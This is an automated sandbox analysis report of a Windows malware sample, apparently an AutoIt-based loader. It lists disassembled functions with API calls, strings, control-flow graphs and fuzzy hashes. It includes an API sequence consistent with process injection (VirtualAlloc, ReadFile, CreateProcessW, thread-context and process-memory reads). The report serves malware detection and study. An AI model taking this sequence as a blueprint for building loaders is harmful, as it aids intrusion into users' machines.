                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                          Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                          • String ID: ,*H$4*H$@fI
                                                                          • API String ID: 615853336-1459471987
                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                          Function 04198E60 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1165 4198e60-4198f0e call 4196860 1168 4198f15-4198f3b call 4199d70 CreateFileW 1165->1168 1171 4198f3d 1168->1171 1172 4198f42-4198f52 1168->1172 1173 419908d-4199091 1171->1173 1177 4198f59-4198f73 VirtualAlloc 1172->1177 1178 4198f54 1172->1178 1175 41990d3-41990d6 1173->1175 1176 4199093-4199097 1173->1176 1179 41990d9-41990e0 1175->1179 1180 4199099-419909c 1176->1180 1181 41990a3-41990a7 1176->1181 1184 4198f7a-4198f91 ReadFile 1177->1184 1185 4198f75 1177->1185 1178->1173 1186 41990e2-41990ed 1179->1186 1187 4199135-419914a 1179->1187 1180->1181 1182 41990a9-41990b3 1181->1182 1183 41990b7-41990bb 1181->1183 1182->1183 1190 41990cb 1183->1190 1191 41990bd-41990c7 1183->1191 1192 4198f98-4198fd8 VirtualAlloc 1184->1192 1193 4198f93 1184->1193 1185->1173 1194 41990ef 1186->1194 1195 41990f1-41990fd 1186->1195 1188 419915a-4199162 1187->1188 1189 419914c-4199157 VirtualFree 1187->1189 1189->1188 1190->1175 1191->1190 1196 4198fda 1192->1196 1197 4198fdf-4198ffa call 4199fc0 1192->1197 1193->1173 1194->1187 1198 41990ff-419910f 1195->1198 1199 4199111-419911d 1195->1199 1196->1173 1205 4199005-419900f 1197->1205 1201 4199133 1198->1201 1202 419912a-4199130 1199->1202 1203 419911f-4199128 1199->1203 1201->1179 1202->1201 1203->1201 1206 4199011-4199040 call 4199fc0 1205->1206 1207 4199042-4199056 call 4199dd0 1205->1207 1206->1205 1213 4199058 1207->1213 1214 419905a-419905e 1207->1214 1213->1173 1215 419906a-419906e 1214->1215 1216 4199060-4199064 CloseHandle 1214->1216 1217 419907e-4199087 1215->1217 1218 4199070-419907b VirtualFree 1215->1218 1216->1215 1217->1168 1217->1173 1218->1217
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04198F31
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04199157
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                          • Instruction ID: d53d907c97d144e7259a65b2e693b568d42697370f836f24dcfb7290211b2adb
                                                                          • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                          • Instruction Fuzzy Hash: CBA1F870E10209EBDF14DFA4C894BEEB7B5BF48304F148199E515AB380D775AE41CB95
                                                                          Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1222 427190-4271ae RegQueryValueExW 1219->1222 1223 40e4eb-40e4f0 1219->1223 1224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1222->1224 1225 42721a-42722a RegCloseKey 1222->1225 1230 427210-427219 call 436508 1224->1230 1231 4271f7-42720e call 402160 1224->1231 1230->1225 1231->1230
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                          • API String ID: 1586453840-614718249
                                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                          Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1236 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                          Function 04198C10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1237 4198c10-4198d55 call 4196860 call 4198b00 CreateFileW 1244 4198d5c-4198d6c 1237->1244 1245 4198d57 1237->1245 1248 4198d6e 1244->1248 1249 4198d73-4198d8d VirtualAlloc 1244->1249 1246 4198e0c-4198e11 1245->1246 1248->1246 1250 4198d8f 1249->1250 1251 4198d91-4198da8 ReadFile 1249->1251 1250->1246 1252 4198daa 1251->1252 1253 4198dac-4198de6 call 4198b40 call 4197b00 1251->1253 1252->1246 1258 4198de8-4198dfd call 4198b90 1253->1258 1259 4198e02-4198e0a ExitProcess 1253->1259 1258->1259 1259->1246
                                                                          APIs
                                                                            • Part of subcall function 04198B00: Sleep.KERNELBASE(000001F4), ref: 04198B11
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04198D4B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: JH2FR4Z1AHPWT7PE2N
                                                                          • API String ID: 2694422964-918654617
                                                                          • Opcode ID: 5864e9759c6882f6779e20279dd80c66b445f14ac39aee41cf1845141b0047f0
                                                                          • Instruction ID: ff677677a96ca4e35292fb8b00dfd2c1c8f2bcf9061e579843e99d3196357ec2
                                                                          • Opcode Fuzzy Hash: 5864e9759c6882f6779e20279dd80c66b445f14ac39aee41cf1845141b0047f0
                                                                          • Instruction Fuzzy Hash: B351B230E14248DAEF11DBA4C854BEFBBB9AF19704F044598E209BB2C1D7B91B45CBA5
                                                                          Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$OpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 1607946009-824357125
                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                          Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 3170942423-0
                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                          Function 04197B00 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                          • Instruction ID: 24c8deb82c49129d43f35003b7bd1a2a45a529bf8b8803ba3448d9ce81af8a9e
                                                                          • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                          • Instruction Fuzzy Hash: 11621E70A14258DBEB24DFA4C880BDEB372EF58300F1095A9D10DEB394E7759E81CB59
                                                                          Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: Error:
                                                                          • API String ID: 4104443479-232661952
                                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                          Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                          • String ID: X$pWH
                                                                          • API String ID: 85490731-941433119
                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                          Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                          • String ID: @EXITCODE
                                                                          • API String ID: 2734553683-3436989551
                                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                          Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                          Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
